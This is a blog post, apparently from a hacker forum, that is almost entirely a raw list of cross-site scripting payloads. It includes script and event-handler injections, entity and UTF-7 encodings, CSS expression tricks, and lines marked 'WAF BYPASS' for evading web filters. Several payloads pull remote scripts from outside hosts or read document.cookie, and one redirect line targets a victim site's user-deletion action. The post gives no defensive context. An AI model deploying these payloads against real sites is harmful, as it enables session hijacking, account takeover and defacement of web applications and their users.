THE LARGEST XSS LIST 2

Jul 18, 20192 min read

Updated: Jul 21, 2019

<IMG SRC=”javascript:alert(‘XSS’)”

javascript:alert("hellox worldss")

<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<<SCRIPT>alert("XSS");//<</SCRIPT>

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search

0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search

<h1><font color=blue>hellox worldss</h1>

<form><button formaction="javascript:alert(XSS)">lol

<img src=x onerror=alert(XSS)//">

<![><img src="]><img src=x onerror=alert(XSS)//">

<? foo="><script>alert(1)</script>">

<! foo="><script>alert(1)</script>">

</ foo="><script>alert(1)</script>">

<? foo="><x foo='?><script>alert(1)</script>'>">

<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">

<% foo><x foo="%><script>alert(123)</script>">

<div style="font-family:'foo
;color:red;';">LOL

LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>

&#x000003c;

&#X3c

&#X03c

&#X003c

&#X0003c

&#X00003c

&#X000003c

&#X3c;

&#X03c;

&#X003c;

&#X0003c;

&#X00003c;

&#X000003c;

&#x3C

&#x03C

&#x003C

&#x0003C

&#x00003C

&#x000003C

&#x000003C;

&#X3C

&#X03C

&#X003C

&#X0003C

&#X00003C

&#X000003C

&#X3C;

&#X03C;

&#X003C;

&#X0003C;

&#X00003C;

&#X000003C;

\x3c

\x3C

\u003c

\u003C

<IMG SRC=\"javascript:alert('XSS')\"

<<SCRIPT>alert(\"XSS\");//<</SCRIPT>

perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out

perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out

<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">

'';!--\"<XSS>=&{()}

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

'';!--"<XSS>=&{()}

<<SCRIPT>alert("XSS");//<</SCRIPT>

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

\";alert('XSS');//

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

¼script¾alert(¢XSS¢)¼/script¾

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></BODY></HTML>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION

<form><button formaction="javascript:alert(123)">crosssitespt

<img src=x onerror=alert(123)//">

<? foo="><script>alert(1)</script>">

<! foo="><script>alert(1)</script>">

</ foo="><script>alert(1)</script>">

+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-

%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-

+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-

%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-

%253cscript%253ealert(document.cookie)%253c/script%253e

“><s”%2b”cript>alert(document.cookie)</script>

“><ScRiPt>alert(document.cookie)</script>

“><<script>alert(document.cookie);//<</script>

foo<script>alert(document.cookie)</script>

<scr<script>ipt>alert(document.cookie)</scr</script>ipt>

%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E

‘; alert(document.cookie); var foo=’

foo\’; alert(document.cookie);//’;

</script><script >alert(document.cookie)</script>

"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>

'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)>

“><detials ontoggle=confirm(0)>

“><IMG SRC=x onerror=javascript:alert("Xss")>

“><img onmouseover=alert(“Xssi”)>

“><test onclick=alert(/Xssi/)>Click Me</test>

“><a href=javascript:alert(/Xss/)Click Me</a>

“><h1 onmouseover=alert(“Xss”)>Hover Me</h1>

“><svg/onload=prompt(“Xss”)>

“><body/onload=alert(“Xssi”)>

“><IMG SRC=x onerror=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

“><a XSS-test href=jAvAsCrIpT&colon;prompt(/Xss/)>ClickMe

“><h1/onclick=a\u006cer\u0074(/Xssi/)>Click Me</h1>

“><a id=”a”href=javascript&colon;a\u006cer\u0074(/Xss/) id=”xss-test”>Click me</a>#a <

<a href=”data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+”>ClickMe

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&

#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; REL=stylesheet">

<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>

<? echo('<SCR)';

echo('IPT>alert("XSS")</SCRIPT>'); ?>

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

WAF BYPASS

"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

"><img src="x:x" onerror="alert(XSS)">

"><iframe src="javascript:alert(XSS)">

<form><a href="javascript:\u0061lert(1)">X

</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'>

On Mouse Over

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

<form><button formaction=javascript&colon;alert(1)>CLICKME

<input/onmouseover="javaSCRIPT&colon;confirm(1)"

\";alert('XSS');//

</script><script>alert('XSS');</script>

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

exp/*<A STYLE='no\xss:noxss("*//*");

xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

¼script¾alert(¢XSS¢)¼/script¾

<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"

veris-->group<svg/onload=alert(/XSS/)//

#"><img src=M onerror=alert('XSS');>

element[attribute='<img src=x onerror=alert('XSS');>

[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]

%22;alert%28%27RVRSH3LL_XSS%29//

javascript:alert%281%29;

alert;pg("XSS")

<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>

<sCR<script>iPt>alert(1)</SCr</script>IPt>

WAF BYPASS

<SCRIPT>alert(/XSS/.source)</SCRIPT>

\\";alert('XSS');//

</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">

<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>

<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS

žscriptualert(EXSSE)ž/scriptu

<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"

<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>

exp/*<A STYLE='no\xss:noxss(\"*//*\");

xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>

<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>

<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>

<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>

<!--[if gte IE 4]>

<SCRIPT>alert('XSS');</SCRIPT>

<![endif]-->

a=\"get\";

b=\"URL(\\"\";

c=\"javascript:\";

d=\"alert('XSS');\\")\";

eval(a+b+c+d);

</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID=\"xss\"><I><B><IMG SRC=\"javascript:alert('XSS')\"></B></I></XML>

<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">

<?import namespace=\"t\" implementation=\"#default#time2\">

<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">

</BODY></HTML>

<? echo('<SCR)';

echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>

Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">

<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>

%3C

&lt

&LT

&LT;

&#60

&#060

&#0060

&#00060

&#000060

&#0000060

&#x3c

&#x03c

&#x003c

&#x0003c

&#x00003c

&#x000003c

&#x000003c;

&#X3c

&#X03c

&#X003c

&#X0003c

&#X00003c

&#X000003c

&#X3c;

&#X03c;

&#X003c;

&#X0003c;

&#X00003c;

&#X000003c;

&#x3C

&#x03C

&#x003C

&#x0003C

&#x00003C

&#x000003C

&#x000003C;

&#X3C

&#X03C

&#X003C

&#X0003C

&#X00003C

&#X000003C

&#X3C;

&#X03C;

&#X003C;

&#X0003C;

&#X00003C;

&#X000003C;

\x3c

\x3C

\u003c

\u003C

THF

THE HACKER FORUM

THE LARGEST XSS LIST 2

Recent Posts

Comments